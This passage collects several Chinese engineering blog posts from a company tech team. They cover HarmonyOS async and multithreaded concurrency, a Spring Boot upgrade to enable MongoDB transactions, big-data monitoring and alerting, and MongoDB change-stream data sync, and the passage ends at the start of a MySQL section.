2、实时视频流分析：

研发基于帧采样+关键帧检测的混合架构

3、边缘计算部署：

研发ARM架构优化版本，⽀持移动端本地检测

五、总结

 

本⽅案验证了开源模型在企业级内容安全场景的可⾏性，为UGC平台合规治理提供了可复⽤的技术范式。通过持续优化多模态检测能⼒与⼯程化效能，构建起兼顾安全性与经济性的智能审核体系。

作者介绍

 

邓力  高级服务端开发工程师


鸿蒙开发中的并发处理
微鲤技术团队 — Fri, 07 Nov 2025 03:50:33 GMT
并发

 


并发是指在一个时间段内，多个事件、任务或操作同时进行或者交替进行的方式。
在计算机科学中，特指多个任务或程序同时执行的能力。
并发可以提升系统的吞吐量、响应速度和资源利用率，并能更好地处理多用户、多线程和分布式的场景。
常见的并发模型有多线程、多进程、多任务、协程等。


一、并发概述

 

为了提升应用的响应速度与帧率，避免耗时任务对主线程的影响，HarmonyOS提供了异步并发和多线程并发两种处理策略。


 

HarmonyOS中的异步并发和多线程并发  

 

  

二、异步并发

 


Promise和async/await提供异步并发能力，是标准的JS异步语法。
异步代码会被挂起并在之后继续执行，同一时间只有一段代码执行，适用于单次I/O任务的场景开发，例如一次网络请求、一次文件读写等操作。无需另外启动线程执行。
异步语法是一种编程语言的特性，允许程序在执行某些操作时不必等待其完成，而是可以继续执行其他操作。


 

1、Promise  

 


Promise是一种用于处理异步操作的对象。它表示一个可能还未完成的操作，并提供了一系列方法来处理操作的结果或错误。
Promise对象有三种状态：pending（进行中）、fulfilled（已完成）和rejected（已失败）。当操作完成时，Promise对象将会从pending状态转变为fulfilled或rejected状态，并调用相应的回调函数。
使用Promise可以更加方便地管理异步操作，并避免回调函数嵌套过多的问题。
Promise是一种用于处理异步操作的对象。它可以认为是一个代理，用来代表一个尚未完成但最终会完成的操作。


Promise实例

 

 myAsyncFunction(): Promise {  
      return new Promise((resolve, reject) => {  
        setTimeout(() => {  
          const success = true; // 模拟提交成功  
          if (success) {  
            resolve('提交成功');  
          } else {  
            reject('提交失败');  
          }  
        }, 1000)  
      })  
    }


import { BusinessError } from '@kit.BasicServicesKit';

this.myAsyncFunction().then((result: string) => {  
  console.log(result)  
})  
  .catch((error: BusinessError) => {  
    console.log(error.message)  
  })  
  .finally(() => {  
    console.log("操作完成")  
  })


通过then方法可以注册成功回调函数，通过catch方法可以注册失败回调函数，通过finally方法可以注册最终回调函数。

当异步操作完成后，Promise会根据操作的结果调用相应的回调函数。

async/await


async/await是一种用于处理异步操作的Promise语法糖
基于Promise对象以一种更简单、易读的方式编写和处理异步代码


 

下面看看async/await的定义和使用


async关键字修饰的函数表示这是一个异步函数，会自动返回一个Promise对象


 async foo() {  
      // 异步操作  
      return "result"  
    }


await关键字


await关键字需要在async函数内部使用，等待一个Promise对象的解析结果，即Promise对象状态变为resolved（成功）或rejected（失败）


 async myAsyncFunction() : Promise {  
      const result: string = await new Promise((resolve) => {  
        setTimeout(() => {  
          const success = true;   
    if (success) {  
            resolve('Hello, world!');  
          }  
        }, 3000)  
      })  
      console.log(result)  
      return result  
    }

    Text(this.message)  
      .id('Submit')  
      .fontSize(50)  
      .fontWeight(FontWeight.Bold)  
      .onClick(() => {  
        let res = this.myAsyncFunction().then((resolve => {  
          console.info("resolve is: " + resolve);  
        })).catch((error: BusinessError) => {  
          console.info("error is: " + error.message);  
        });  
        console.info("result is: " + res);  
      })


在async函数中使用await关键字可以实现类似同步代码的连续执行效果，而不需要嵌套使用回调函数或链式调用then方法。

async/await的优点


代码可读性更高，更接近同步代码的写法，易于理解和维护
可以在代码中使用try/catch语句来捕获和处理异步操作产生的错误
可以使用常规的控制流语法（如循环、条件语句）来组织和管理异步代码的执行顺序
async/await是依赖Promise对象来处理异步操作
async/await只是一种更加简洁和易读的语法，本质上仍然是基于Promise的异步编程模式


IO异步任务开发示例

import fs from '@ohos.file.fs';  
    import common from '@ohos.app.ability.common';

    async write(data: string, file: fs.File): Promise {  
      fs.write(file.fd, data).then((writeLen: number) => {  
        console.log("write data length is: " + writeLen)  
      }).catch((error: BusinessError) => {  
        console.error(`write data failed. Code is ${error.code}, message is ${error.message}`);  
      })  
    }  

    async testWriteFile() : Promise {  
      let context = getContext() as common.UIAbilityContext  
      let filePath: string = context.filesDir + "/logFile.txt"  
      let file: fs.File = await fs.open(filePath, fs.OpenMode.READ_WRITE | fs.OpenMode.CREATE)  
      this.write("Hello World", file).then(()=> {  
        console.log("write success")  
      }).catch((error: BusinessError) => {  
        console.error(`write data failed. Code is ${error.code}, message is ${error.message}`);  
      })  
    }


三、多线程并发

 

Actor并发模型

 


Actor并发模型是一种用于并发计算的编程模型
在该模型中，每一个线程都是一个独立Actor，每个Actor有自己独立的内存，Actor之间通过消息传递机制触发对方Actor的行为
Actor并发模型对比内存共享并发模型的优势在于不同线程间内存隔离，不会产生不同线程竞争同一内存资源的问题
不需要考虑对内存上锁导致的一系列功能、性能问题，提升了开发效率
ArkTS语言选择的并发模型就是Actor
ArkTS提供了TaskPool和Worker两种并发能力，TaskPool和Worker都基于Actor并发模型实现


TaskPool和Worker的实现特点对比



TaskPool和Worker的适用场景对比

性能方面使用TaskPool会优于Worker，因此大多数场景推荐使用TaskPool。
TaskPool偏向独立任务维度，任务在线程中执行，不需要关注线程的生命周期。超长任务（大于3分钟）会被系统自动回收。

适用场景：


运行时间超过3分钟的任务，需要使用Worker。
有关联的一系列同步任务，例如在需要创建和使用不同句柄的场景中，每次创建的句柄需要永久保存。这种情况需要使用Worker来管理线程生命周期。
需要频繁取消任务的场景，例如图库大图浏览，为了提升用户体验，同时缓存当前图片左右侧各2张图片。当用户往一侧滑动跳到下一张图片时，需要取消另一侧的一个缓存任务。这种情况下，使用TaskPool来管理任务会更适合。Worker偏向线程的维度，支持长时间占据线程执行，需要主动管理线程的生命周期。
需要长时间占用线程执行的任务，例如网络请求、数据库操作等。这种情况下，使用Worker可以保持线程的稳定性和性能。
另外，在大量或者调度点较分散的任务场景下，如大型应用的多个模块包含多个耗时任务，不方便使用Worker去做负载管理，推荐采用TaskPool。


TaskPool运作机制




TaskPool支持开发者在主线程封装任务抛给任务队列，系统会自动选择合适的工作线程，进行任务的分发及执行，再将结果返回给主线程
TaskPool提供简洁易用的接口，支持任务的执行和取消操作
系统统一线程管理，结合动态调度及负载均衡算法，可以节约系统资源


Worker运作机制




Worker子线程与宿主线程拥有独立的实例，包含基础设施、对象、代码段
每个Worker启动存在一定的内存开销，需要限制Worker的子线程数量
Worker子线程和宿主线程之间的通信是基于消息传递的
Worker通过序列化机制与宿主线程之间相互通信，完成命令及数据交互


TaskPool注意事项



@Concurrent装饰器：校验并发函数


在HarmonyOS中，@Concurrent装饰器用于标识一个方法需要在工作线程中执行
该装饰器可以应用于普通的方法或者回调方法
使用@Concurrent装饰器的方法会在一个工作线程中执行，不会阻塞主线程的运行。
对于一些耗时操作或者需要与其他服务进行交互的方法非常有用
在方法执行完成后，可以使用HarmonyOS提供的线程间通信机制将结果传递回主线程


装饰器使用示例

import taskpool from '@ohos.taskpool';  
    @Concurrent  
    function add(num1: number, num2: number): number {  
      return num1 + num2  
    }  

    async function ConcurrentFunc(): Promise {  
      try {  
        let task: taskpool.Task = new taskpool.Task(add, 1, 2)  
        console.log("taskpool res is:" + await taskpool.execute(task))  
      } catch (e) {  
        console.error("taskpool execute error is:" + e)  
      }  
    }

    @Entry  
    @Component  
    struct Index {  
      @State message: string = 'Submit';  

          build() {  

            RelativeContainer() {  

              Text(this.message)  
                .id('Submit')  
                .fontSize(50)  
                .fontWeight(FontWeight.Bold)  
                .onClick(() => {  
                    ConcurrentFunc()  
                })  
                .alignRules({  
                  center: { anchor: '__container__', align: VerticalAlign.Center },  
                  middle: { anchor: '__container__', align: HorizontalAlign.Center }  
                })  
            }  
            .height('100%')  
            .width('100%')  
          }
    }


同步任务


在异步编程中，任务同步是指在多个异步任务之间进行协调和同步执行的过程。
当存在多个异步任务需要按照一定的顺序或条件进行执行时，任务同步可以确保任务按照预期的顺序或条件进行执行。


常见的任务同步方式包括：


回调函数：通过在一个异步任务完成后触发回调函数来执行下一个任务。
Promise/异步函数：使用Promise或异步函数的异步链式调用，通过then或await等关键字确保任务按顺序执行。
线程间通信：通过消息队列或信号量等机制，在异步任务之间传递消息或信号，使得任务按特定的顺序或条件执行。
锁或互斥体：使用锁或互斥体等同步机制，在异步任务之间实现互斥访问，确保任务按照顺序执行。
任务同步的目的是确保异步任务能够按照一定的顺序或条件执行，以避免竞态条件、数据错误或逻辑错误。


使用taskpool处理同步任务

export default class Handle {  
      private static singleton : Handle  

      public static getInstance() : Handle {  
        if (!Handle.singleton) {  
          Handle.singleton = new Handle();  
        }  
        return Handle.singleton;  
      }  

      public syncGet() {  
        return  
      }  

      public static syncSet(num: number) {  
        return  
      }  
    }

    import taskpool from '@ohos.taskpool';
    import Handle from './Handle';

    // 定义并发函数，内部调用同步方法  
    @Concurrent  
    function func(num: number) {  
      // 调用静态类对象中实现的同步等待调用  
      Handle.syncSet(num)  
      // 或者调用单例对象中实现的同步等待调用  
      Handle.getInstance().syncGet()  
      return true  
    }  

    // 创建任务并执行  
    async function asyncGet() {  
      // 创建task并传入函数func  
      let task = new taskpool.Task(func, 1);  
      // 执行task任务，获取结果res  
      let res = await taskpool.execute(task);  
      // 对同步逻辑后的结果进行操作  
      console.info(String(res));  
    }

    asyncGet()


总结

 


本次主要分享了关于鸿蒙开发中的异步并发和多线程并发的
异步并发的介绍，和基本的用法，简单的举例；两种异步操作实现的对比
多线程并发的简单概述，TaskPool和Worker两种多线程并发能力的介绍和对比，适用场景
最后提及了TaskPool使用的简单例子


作者介绍

 


吕游  资深Android开发工程师



SpinrgBoot升级总结
微鲤技术团队 — Thu, 06 Nov 2025 09:32:00 GMT
一、背景

公司目前使用的Spring Boot版本为1.5.12.RELEASE，该版本较低且不支持MongoDB事务管理功能。随着公司业务的不断扩展和发展，涉及到更多复杂的业务场景，确保数据一致性和事务原子性显得更加重要。

基于上述情况，本次对Spring Boot的升级变得至关重要。主要原因包括：


实现数据一致性：升级Spring Boot版本以支持MongoDB事务管理功能可以有效保证数据操作的一致性和原子性，避免出现数据不一致或操作异常等问题，提升系统稳定性和可靠性。
技术迭代和一致性：随着技术的不断更新和演进，保持技术栈的一致性和与其他技术组件的兼容性是非常重要的。使用更新的Spring Boot版本可以获得更多功能改进和性能优化，以及更好的支持最新的技术要求。
开发效率和质量：通过升级Spring Boot版本，开发人员可以更加高效地处理事务管理，简化代码逻辑，提高开发效率和代码质量，减少潜在的错误和维护成本。


基于当前的业务需求和技术发展趋势，升级Spring Boot版本以支持MongoDB事务管理是当下的紧迫任务。这将有助于提升公司的技术水平、业务发展和竞争力，同时可以降低风险并为未来的发展做好充分准备。因此，推动Spring Boot版本的升级是非常有必要的。

二、版本选择

Spring Boot版本支持MongoDB事务管理要求：


Mongodb 4.0副本集群、Mongodb 4.2支持分片集群事务（必须）
spring.data.mongodb 版本2.1以上（必须）
Spring Boot版本2.1以上（必须）


目前业务中使用的是Mongodb 4.0及4.0以上版本，因此只需升级Spring Boot、spring.data.mongodb即可。

为了在支持MongoDB事务管理的基础上尽量减少项目代码修改范围，因此版本选择如下：


spring.data.mongodb：2.1.15.RELEASE
springboot：2.1.12.RELEASE


三、版本特征

 

默认动态代理策略

 

默认使用CGLIB动态代理，包括AOP。如果需要基于接口的动态代理, 需要设置spring.aop.proxy-target-class属性为false。

WebMvcConfigurerAdapter过时

 

WebMvcConfigurerAdapter这个抽象类已经过时，可以用WebMvcConfigurer替代。

// 1.5.12.RELEASE
public class MyWebMvcConfigurerAdapter extends WebMvcConfigurerAdapter {  
    // ...
}

// 2.1.12.RELEASE
public class MyWebMvcConfigurerAdapter implements WebMvcConfigurer {  
    // ...
}


使用关系型数据库

 

默认的数据库连接池由Tomcat换成HikariCP。性能方面 HikariCP > Druid > tomcat-jdbc > dbcp > c3p0

如果在一个Tomcat应用中用spring.datasource.type来强制使用Hikari连接池， 则可以去掉这个override。

Redis

 

当使用spring-boot-starter-redis的时候，Lettuce现已取代Jedis作为Redis驱动。仍然支持Jedis，并且你可以任意切换依赖机制，通过排除io.lettuce:lettuce-core和添加redis.clients.jedis的方式。

Servlet-specific 的关于 server 的属性

 

一些Servlet-specific已经移动到server.servlet的server.*属性：


依赖版本

 

以下库的最低支持版本：


Elasticsearch 5.6
Gradle 4
Hibernate 5.2
Jetty 9.4
Spring Framework 5
Spring Security 5
Tomcat 8.5


更多特性：

https://github.com/spring-projects/spring-boot/wiki/Spring-Boot-2.0-Migration-Guide

https://github.com/spring-projects/spring-boot/wiki/Spring-Boot-2.1-Release-Notes

四、升级步骤

 

步骤1、pom文件修改

 

（1）升级suishen-webx-parent版本

  
        suishen-webx
        suishen-webx-parent
        2.0-SNAPSHOT
    


（2）完成后确认项目中的依赖版本：



注意：

 


suishen-webx-parent已将表格中的依赖升级，项目中无需再次手动引入。
其他依赖相匹配的版本，请参照：https://docs.spring.io/spring-boot/docs/2.1.12.RELEASE/reference/pdf/spring-boot-reference.pdf


步骤2、开启事务

 

（1）启用mongodb事务管理

 

引入@EnableTransactionManagement

@EnableTransactionManagement
public class MainApplication extends SuishenWebxApplication {  
}


（2）配置mongodb事务管理器

方式1：使用applicationContext-mongodb.xml配置：



    



方式2：使用Configuration：

@Configuration
public class TransactionConfig {

    @Bean
    public MongoTransactionManager transactionManager(MongoDatabaseFactory factory){
        return new MongoTransactionManager(factory);
    }
}


步骤3、修改mongo密码

 

由于spring.data.mongodb 2.1.15.RELEASE版本在数据库认证时，会先将密码进行URLDecoder.decode校验，因此mongo密码中的%号需要替换成%25。

验证流程可参考：
org.springframework.data.mongodb.config.MongoCredentialPropertyEditor.extractUserNameAndPassword 

spring.data.mongodb 1.10.15.RELEASE版本



spring.data.mongodb 2.1.15.RELEASE版本



 

五、使用事务

 

（1）声明式事务处理

添加@Transactional（org.springframework.transaction.annotation.Transactional）注解，
代码示例如下

 @SuishenLog(logName = "添加策略")
    public StrategyVo addStrategy(StrategyAddReq addReq) {
        SuishenUser suishenUser = SecurityContextUtil.getSessionUser();
        long now = System.currentTimeMillis();
        Strategy strategy = Strategy.builder()
                .projectId(addReq.getProjectId())
                .strategyName(addReq.getStrategyName())
                .strategyDesc(addReq.getStrategyDesc())
                .status(addReq.getStatus())
                .createUser(suishenUser.getNickName())
                .createTime(now)
                .updateUser(suishenUser.getNickName())
                .updateTime(now)
                .build();
        strategy = strategyService.addStrategy(strategy);
        LogContext.instance().appendLog("操作人(%s)", suishenUser.getNickName())
                .appendLog("策略id(%s)", strategy.getId());
        // 测试代码
        if (Objects.nonNull(strategy)) {
            throw new BusinessException("添加策略失败");
        }
        StrategyLog strategyLog = StrategyLog.builder()
                .projectId(strategy.getProjectId())
                .strategyId(strategy.getId())
                .createUser(suishenUser.getNickName())
                .createTime(now)
                .updateUser(suishenUser.getNickName())
                .updateTime(now)
                .build();
        strategyLogService.addStrategyLog(strategyLog);
        return StrategyVo.buildVo(strategy);
    }

    @SuishenLog(logName = "添加策略事务")
    @Transactional(propagation = Propagation.REQUIRED, rollbackFor = Exception.class)
    public StrategyVo addStrategyTest(StrategyAddReq addReq) {
         return addStrategy(addReq);
    }


事务传播行为：当事务方法被另一个事务方法调用时，必须指定事务应该如何传播

Spring 定义了如下七种传播行为，这里以A业务和B业务之间如何传播事务为例说明：


PROPAGATION_REQUIRED ：required , 必须。默认值，A如果有事务，B将使用该事务；如果A没有事务，B将创建一个新的事务。
PROPAGATION_SUPPORTS：supports ，支持。A如果有事务，B将使用该事务；如果A没有事务，B将以非事务执行。
PROPAGATION_MANDATORY：mandatory ，强制。A如果有事务，B将使用该事务；如果A没有事务，B将抛异常。
PROPAGATIONREQUIRESNEW ：requires_new，必须新的。如果A有事务，将A的事务挂起，B创建一个新的事务；如果A没有事务，B创建一个新的事务。
PROPAGATIONNOTSUPPORTED ：not_supported ,不支持。如果A有事务，将A的事务挂起，B将以非事务执行；如果A没有事务，B将以非事务执行。
PROPAGATION_NEVER ：never，从不。如果A有事务，B将抛异常；如果A没有事务，B将以非事务执行。
PROPAGATION_NESTED ：nested ，嵌套。A和B底层采用保存点机制，形成嵌套事务。


（2）编程式事务处理

代码示例如下

/**
 * 添加策略事务测试
 */
@SuishenLog(logName = "添加策略事务测试")
public StrategyVo addStrategyTest2(StrategyAddReq addReq) {
    // txTemplate可以和transactionManager进行相同的配置，而不需要每次new，本代码仅作为测试使用
    TransactionTemplate txTemplate = new TransactionTemplate(mongoTransactionManager);
    return txTemplate.execute(new TransactionCallback() {
        @Override
        public StrategyVo doInTransaction(TransactionStatus transactionStatus) {
            try {
                return addStrategy(addReq);
            } catch (Exception e) {
                transactionStatus.setRollbackOnly();
            }
            return null;
        }
    });
}


（3）数据验证

 


执行addStrategy，Strategy新增成功，StrategyLog新增失败
执行addStrategyTest，Strategy新增失败，StrategyLog新增失败
执行addStrategyTest2，Strategy新增失败，StrategyLog新增失败


org.springframework.transaction.UnexpectedRollbackException: Transaction rolled back because it has been marked as rollback-only  
    at org.springframework.transaction.support.AbstractPlatformTransactionManager.processRollback(AbstractPlatformTransactionManager.java:873)
    at org.springframework.transaction.support.AbstractPlatformTransactionManager.commit(AbstractPlatformTransactionManager.java:710)
    at org.springframework.transaction.interceptor.TransactionAspectSupport.commitTransactionAfterReturning(TransactionAspectSupport.java:534)


作者介绍


孙景亮 资深服务端开发工程师



大数据监控建设之道
微鲤技术团队 — Fri, 28 Jun 2024 03:20:26 GMT
1、为什么要做

从谷歌2003年发布的三篇经典论文《The Google File System 》 、《MapReduce: Simplified Data Processing onLarge Clusters》 、《Bigtable: A Distributed Storage System for Structured Data》开启了大数据的时代，经过20年的蓬勃发展，大数据已经非常普及常用了。 

考虑到大数据4V的特性，你很难说只用一个技术方案或者组件就能应对所有的场景和需求。所以大数据技术架构相对来说还是较为复杂的，其中还涉及到了很多分布式、高可用的机制。比如HDFS的namenode，那如果namenode没有做HA的情况下，出现服务异常终止的情况，基本上整个大数据集群就会宕掉，所有的服务基本都不可用了。这种情况是致命的，你的服务将彻底瘫痪并且无法快速恢复。 

那为了保证大数据服务的稳定高可用，我们除了要对相关的服务或组件做HA设计，还需要有完善的监控告警方案，来及时发现当前大数据服务中的隐患和故障并进行消除，已确保当前大数据服务的SLA。 

接下来我们就来展开讨论，本文是关于大数据监控告警建设的道而非术，我们会介绍从哪些方面去建设监控告警，而如何建设采用哪些技术方案你完全可以结合当前生产实际情况或者现有标准规范去实施。

2、从哪些方面做

在开始之前，我们有必要介绍下大数据的技术架构，这样有助于我们了解大数据的组成架构、这样我们可以更好的切入去做监控的建设。

我们从下向上看，我们可以分层如下 

1. 数据来源层：此层基本上是数仓的ODS层数据来源，如app/web的埋点日志，MySQL/mongodb中的业务数据，外部文件等等。基本分两类：一类是用户在app/web触发的相关行为日志，一般通过flume/logstash+Kafka的技术方案来收集，另一类就是业务数据了。我们在此层需要关注的就是收集到的行为日志的波动情况，由于业务DB无法直连，所以我们更多的是在数据集成链路和业务数据接入数仓ODS层后做相关的数据质量监控来监测业务数据波动情况。 

2. 数据采集层：此层是将业务数据、埋点数据接入数仓的实现，我们当前使用的是FlinkCDC做业务数据实时集成，在此层可能需要关注的就是你的数据集成任务是否正常。 

3. 数据存储层：此层基本是将收集到的业务数据、埋点数据放入大数据存储中，考虑到不同的数据存储需求，此层的数据存储可能会比较丰富不仅仅只有HDFS，此层需要关注的就是存储相关服务健康度以及你的存储使用情况。 

4. 数据计算层：此层主要就是数据计算了，会有Flink实时处理&离线批处理。此层需要关注的就是你的计算任务执行是否正常、执行是否超时、Flink任务是否异常终止、Flink任务ck是否正常等等。需要结合你的计算任务来梳理需要做哪些监控。 

5. 调度引擎层：此层就是对你的计算任务做周期性调度了，同样会有Flink实时处理&离线批处理。此层需要关注的就是你的调度服务健康度，以及任务的调度执行情况了。我们将任务的调度执行情况和数据计算层的监控一起来看，调度本身也是在做数据的计算执行。 

6. 数据服务层：数据服务层基本上就是对外提供数据服务能力了，不同公司会有不同的数据服务能力输出方案。可以是grafana等数据可视化平台，也可能是对外API输出，或者是自建的BI平台等等。此层基本上关注你的数据服务能力是否正常，需要结合你的生产实际情况来看。

所以我们将其抽象如下：

大数据基座

大数据基座基本就是集群相关服务了，包括但不限于HDFS、hive、yarn、spark等等，他们组合再一起共同构建起了大数据的地基，我们可以基于此在上层进行数据的存储、计算、分析等等一系列工作。
那么按照我们的经验来说，不管你是托管在第三方云厂商还是基于CDH或者HDP建设，其监控需要关注的点基本相同。主要如下 

● 主机实例健康度 

  ○ CPU 

  ○ 内存 

  ○ 磁盘使用、磁盘读写 

  ○ 网络 

  ○ ...... 

    

● 集群服务健康度 

  ○ hive、hdfs、yarn等服务健康度，服务不可用，进程故障等 

  ○ 各服务堆内存使用情况 

  ○ yarn 任务挂起、yarn资源使用、yarn队列资源不足 

  ○ hive sql执行成功率低 

  ○ 进程重启、主备切换等关键事件 

  ○ ...... 

  

集群服务健康度相对来说要做的更多，我们具体到每个单独的组件可能都会有不同类型的监控，如hive的hms，hiveserver2，hive session等等，这里我们不再展开赘述，你可以参照各云厂商大数据集群的监控也可以参照各组件的官方文档。

数据集成

首先可以看下我们的其中一部分的数据集成链路。这样有利于我们理解需要做哪些方面的监控。

行为埋点数据

首先我们结合自己的实际业务情况指定了客户端埋点协议，埋点协议主要从用户信息、设备信息、事件信息、应用信息等几个大方面去定义一个完整的事件内容，这样全公司各APP产品都可以基于我们的埋点协议来去做全链路的上报、存储、统计分析等流程。 

那么用户在APP触发点击浏览行为时，就会生成符合埋点协议的事件，然后收集nginx中的日志，通过logstash 向Kafka发送，因为我们的埋点相对来说还是比较大的，一天的增量约500GB，所以我们在这里用Kafka来做缓冲。 

埋点日志进入到Kafka后，我们会用Flink来去做实时的ETL，将其写入Kudu数据加速层，做近实时的统计分析。 

那么在此处你要考虑的监控就是整个日志收集链路的各个环节，包括但不限于 

● logstash服务健康度 

● Kafka服务健康度 

● 埋点事件上报地址是否正常 

● ..... 

即使你做了上述各环节的监控，也不能百分百保证埋点日志出问题能立刻发现。我们这边就遇到过两次其它类型的问题，其一是客户端埋点上报地址使用的域名被封禁了，其二是客户端埋点上报地址的http证书过期导致埋点无法正常上报。此时你的各个服务是正常的，但是埋点却报不上来了。所以我们还需要持续的对上报的埋点事件总量波动做监控，你可以结合你的实际业务情况，做分钟、小时、天粒度的各事件波动监控。这样就可以在埋点事件量出现大幅波动的情况下，迅速感知到。
下图是我们的一个示例：




业务数据

由于大数据侧无法直连业务DB做一些精细化的监控。所以我们只能在数据集成的链路和进入ods层的数据层面做相关的监控告警了。 

我们会用FlinkCDC来去做业务数据库的整库变更订阅。所以首先要关注的就是你的FlinkCDC任务的健康度，Flink 任务执行是否正常等。我们在下文中的计算实时部分再详细提及。 

除此之外，在FlinkCDC将业务数据写入Kudu后，我们还会持续的关注业务数据最新的数据产生时间，这样在业务数据超过指定时间仍未有更新时及时发现。介入确认处理流程。 

当然你也可以在你的FlinkCDC 任务中实现这个功能，具体的实现还是结合你的实际业务情况和规范来实施。 

除了基于整库的全局监控外，在业务数据进入数仓的ODS层后，我们还会结合数据质量监控来做具体的业务表的数据监控，比如单表数据掉0或者单表数据波动异常的情况，这部分将在数据质量环节介绍，此处就不再赘述。  

存储

HDFS

如果你使用的是HDFS，那么从存储层面，我们需要监控关注的点如下： 

● DataNode磁盘故障：可能会导致已写入的文件丢失。 

● 单副本的块数超过阈值：单副本的数据在节点故障时容易丢失，单副本的文件过多会对HDFS文件系统的安全性造成影响。 

● 待补齐的块数超过阈值：HDFS可能会进入安全模式，无法提供写服务。丢失的块数据无法恢复。 

● 数据目录配置不合理：数据磁盘挂载在根目录或其它关键目录下。对HDFS系统性能产生影响。 

● HDFS文件数超过阈值：HDFS文件数过多，磁盘存储不足可能造成数据入库失败。对HDFS系统性能产生影响。 

● 丢失的HDFS块数量超过阈值：HDFS存储数据丢失，HDFS可能会进入安全模式，无法提供写服务。丢失的块数据无法恢复。 

● DataNode磁盘空间使用率超过阈值，会影响到HDFS的数据写入。 

● HDFS磁盘空间使用率超过阈值，HDFS集群磁盘容量不足，会影响到HDFS的数据写入。 

● ......

对象存储

那如果你使用的是对象存储，那么恭喜你上述HDFS的相关监控项基本都不需要你去关注了，一切交给对象存储。
你可能需要关注如下几点： 

● 存储桶的使用情况 

● 数据生命周期管理策略 

● 安全审计，如AK/SK的保存修改 

● ......

计算

计算层面基本上关注的就是具体任务的执行情况了，我们针对实时、离线任务分开就行阐述。

实时

Flink已经成为实时计算领域的事实标准，所以我们这里的实时主要针对Flink，实时任务需要关注的点如下： 

● 任务是否异常终止 

● 任务重启次数 

● Kafka消费是否延迟 

● ck是否正常、耗时情况、失败数 

● 是否有反压、倾斜 

● job本身的资源使用情况 

● sink端的执行时间是否超时 

● 自定义指标打点收集 

● ...... 

下图是我们的Flink任务监控的一个示例：



关于Flink任务的监控，可以结合Flink metrics来去更细粒度的进行制定。

离线

离线任务主要为批处理任务，批处理任务相对简单，无非成功或失败或者超时，所以我们主要关注如下几点： 

● 任务异常终止 

● 任务执行超时 

● 任务平均执行时间(超时优化) 

● 长尾任务 

● 占用资源过多任务 

● ...... 



调度

调度服务相对来说简单，在保证HA的前提上，关注你的调度服务是否异常即可。如dolphinscheduler，我们要关注 

● master节点状态 

● worker节点状态 

● 节点相关负载 



数据服务

数据服务是对外提供的数据能力，这也是大数据直接展现价值的载体。所以数据服务相关的监控需要格外重视。
我们需要关注如下： 

● 数据服务是否正常，如grafana能否正常访问，API服务是否能够正常调用 

● 提供的数据是否准确，数据是否缺失等（我们将在数据质量环节详细阐述） 

● 服务响应时间，如页面加载时间、API调用时间 

● ......

数据质量

数据质量监控会相对复杂，但是它是必须要做的，错误的数据将会直接影响业务的相关决策判断。 

根据DAMA制定的数据标准管理办法，我们需要从如下角度进行数据质量监控 

1. 完整性：数据完整性问题包括：模型设计不完整，例如：唯一性约束不完整、参照不完整；数据条目不完整，例如：数据记录丢失或不可用；数据属性不完整，例如：数据属性空值。 

2. 准确性：准确性也叫可靠性，是用于分析和识别哪些是不准确的或无效的数据，不可靠的数据可能会导致严重的问题，会造成有缺陷的方法和糟糕的决策。 

3. 时效性：时效性用来衡量能否在需要的时候获到数据，数据的及时性与企业的数据处理速度及效率有直接的关系，是影响业务处理和管理效率的关键指标。 

4. 唯一性：用于识别和度量重复数据、冗余数据。重复数据是导致业务无法协同、流程无法追溯的重要因素，也是数据治理需要解决的最基本的数据问题。例如：业务主键id重复。 

5. 数据一致性：多源数据的数据模型不一致，例如：命名不一致、数据结构不一致、约束规则不一致。数据实体不一致，例如：数据编码不一致、命名及含义不一致、分类层次不一致、生命周期不一致……。相同的数据有多个副本的情况下的数据不一致、数据内容冲突的问题。

在此基础上，我们需要对各种类型进行细粒度的划分。

3、总结和经验


使用邮件组或者订阅的方式进行告警通知，以免人员变动情况下相关的告警通知对象变更。  
重要告警集成睿象云，进行短信和电话告警，以免非工作日时间告警接受处理延迟。  
监控不需要追求大而全，而是按照更要程度及SLA进行建设。  
可能受影响的相关方必须订阅相关监控告警通知，以免A方以为此告警不重要，但是对B方很重要，甚至会影响业务。  
监控、告警、处理要有完整的流程闭环及知识沉淀，形成监控告警处理知识库。


4、参考文档

https://www.infoq.cn/article/XudrcZEUFhPJR7kfYNur 

https://juejin.cn/post/6967234979847733279 

https://support.huaweicloud.com/intl/zh-cn/usermanual-mrs/alm_13000.html 

https://zhuanlan.zhihu.com/p/208935690

作者介绍


冯成杨 资深大数据开发工程师



数据库同步实践（suishen-cdc）
微鲤技术团队 — Mon, 27 May 2024 09:12:21 GMT
一、需求背景

需要将业务数据库的数据，向数仓同步，目前包括两种数据库：mongo、mysql。

二、总体实现方案

1、总体流程




a、定时任务，加载数据库事件偏移信息，统一监听数据库变更事件；
b、本地缓存收集事件变更信息（一定的数据量、一定的收集时间）；
c、收集达到阈值后，向消息队列发送消息；
d、发送消息成功后，使用redis记录最后一条消息的偏移信息；
e、消息队列批量读取事件，批量向数仓同步数据。


2、mongo实现方案

mongo-java-driver库，提供了Change Streams API来监听和获取实时变更（change）事件。通过Change Streams，可以监视集合中的插入、更新和删除等操作，并对这些变更事件做出响应。  

@Test
public void tst() {  
    // 获取指定数据库连接
    MongoDatabase database = mongoTemplate.getDb().getMongoClient().getDatabase("database");
    // 过滤需要监听的表
    Document matchStage = new Document("$match", new Document("ns.coll", new Document("$in",
            Arrays.asList("colletion", "label"))));
    // 开启监听
    ChangeStreamIterable changeStream = database
            .watch(Arrays.asList(matchStage)).fullDocument(FullDocument.UPDATE_LOOKUP)
            // 设置事件偏移信息
            .resumeAfter(BsonDocument.parse("{\"_data\": \"8265AB99800000000129295A10048EBDB1DB4C23440CAD9BD906E9098378463C5F6964003C3134313334000004\"}"));

    for (ChangeStreamDocument document : changeStream) {
        // 根据操作类型进行相应的操作
        if (document.getOperationType() == OperationType.INSERT) {
            // 处理插入操作
            System.out.println(JSON.toJSONString(document.getFullDocument()));
        } else if (document.getOperationType() == OperationType.UPDATE) {
            // 处理更新操作
            System.out.println(JSON.toJSONString(document.getFullDocument()));
        } else if (document.getOperationType() == OperationType.DELETE) {
            // 处理删除操作
            System.out.println(JSON.toJSONString(document.getDocumentKey()));
        }
        // 获取偏移信息
        BsonDocument resumeToken = document.getResumeToken();

        System.out.println(resumeToken.toJson());
    }
}


注意点


mongo的changeStream支持订阅指定某些表，但是如果后续要新增监听的表，会导致就的偏移信息不可用，所以建议监听整个库，由业务对不需要处理的表过滤；
一些表存在过期索引，对于这种数据库自动过期的数据变更是否需要处理，业务也要自行处理。
对于偏移的更新，除了业务关心的数据变更事件以外，其余的事件也需要及时的更新偏移信息，避免重启后读取的数据量过大。


3、mysql实现方案

